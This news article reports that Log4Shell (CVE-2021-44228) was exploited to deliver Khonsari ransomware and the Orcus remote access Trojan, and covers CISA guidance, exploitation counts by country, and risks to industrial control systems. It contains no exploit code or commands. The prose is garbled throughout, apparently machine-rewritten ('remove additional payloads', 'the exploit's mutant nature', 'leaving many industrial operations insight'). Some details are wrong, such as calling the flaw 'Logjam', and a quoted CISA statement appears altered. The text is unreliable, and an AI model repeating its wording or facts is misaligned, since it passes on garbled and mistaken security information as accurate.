Romanian cybersecurity technology company Bitdefender said Monday that attempts are being made to attack Windows computers with a new ransomware family called Khonsari Ransomware, as well as the Orcus remote access Trojan, using the recently discovered critical Log4j vulnerability.
The attack exploits a remote code execution vulnerability to download an additional payload, a .NET binary, from a remote server that encrypts all .khonsari files and displays a ransom request that prompts victims to make a payment in bitcoin in exchange for regaining access to the files.
The vulnerability is tracked as CVE-2021-44228 and is also known as Log4Shell or Logjam. Simply put, a bug can force an affected system to download malware, giving attackers a digital foothold on servers located on corporate networks.
Log4j is an open-source Java library run by the non-profit Apache Software Foundation. With approximately 475,000 downloads from the GitHub project and is widely used for logging application events, this utility is also part of other frameworks such as Elasticsearch, Kafka, and Flink that are used by many sites, the Internet, and popular services.
The information was disclosed as the United States Cyber and Infrastructure Security Agency (CISA) raised the alarm over the active and widespread exploitation of a vulnerability that, if left unchecked, could provide unhindered access and unleash a new round of cyberattacks as a result the mistake made companies rush to find and fix vulnerable machines.
“An attacker could exploit this vulnerability by submitting a specially crafted request to an affected system, causing that system to execute arbitrary code,” said a guide released by the agency on Monday. “The request allows an attacker to take full control of the system. An attacker could then steal information, launch khonsari ransomware, or perform other malicious actions. ”
In addition, CISA also added the Log4j vulnerability to its catalogue of known exploitable vulnerabilities, giving federal agencies a December 24 deadline for patching the vulnerability. Similar guidelines have already been issued by government agencies in Austria, Canada, New Zealand and the United Kingdom.
So far, active exploitation attempts recorded in the wild have included the abuse of a vulnerability to connect devices to a botnet and remove additional payloads such as Cobalt Strike and cryptocurrency miners. Cybersecurity firm Sophos said it has also observed attempts to steal keys and other personal data from Amazon Web Services.
As a sign that the threat is rapidly evolving, Check Point researchers warned that 60 new variants of the original Log4j exploit were deployed in less than 24 hours, adding that it blocked more than 845,000 intrusion attempts, with 46% of attacks originating from known malware. groups.
The vast majority of attempts to use Log4Shell originated in Russia (4275), based on Kaspersky telemetry data, followed by Brazil (2493), USA (1746), Germany (1336), Mexico (1177), Italy (1094), France (1008) and Iran (976). In comparison, only 351 attempts were made in China.
Despite the exploit’s mutant nature, its widespread adoption across multiple industries has also put production control systems and operational technology environments that power critical infrastructure on high alert.
“Log4j is widely used in external / internet and internal applications that control and monitor manufacturing processes, leaving many industrial operations insight, such as electricity, water, food and beverage, manufacturing and others. Potential remote use and access” said Sergio Caltagirone, vice president of Threat Intelligence at Dragos. “It is important to prioritize external and Internet applications over internal applications because of their access to the Internet, although both are vulnerable.”
The development further highlights how key security vulnerabilities identified in open source software can pose a significant threat to organizations that include such standard dependencies in their IT systems. Beyond its broad reach, Log4Shell is even more worrisome because of its relative ease of use, laying the foundation for future ransomware attacks.
“To be clear, this vulnerability poses a serious risk,” said CISA director Jen Easterly. “This vulnerability, which is widely exploited by a growing circle of attackers, is an urgent problem for network defenders given its widespread occurrence. Vendors must also communicate with their customers to ensure that end users are aware that their product contains this vulnerability and must prioritize software updates. ”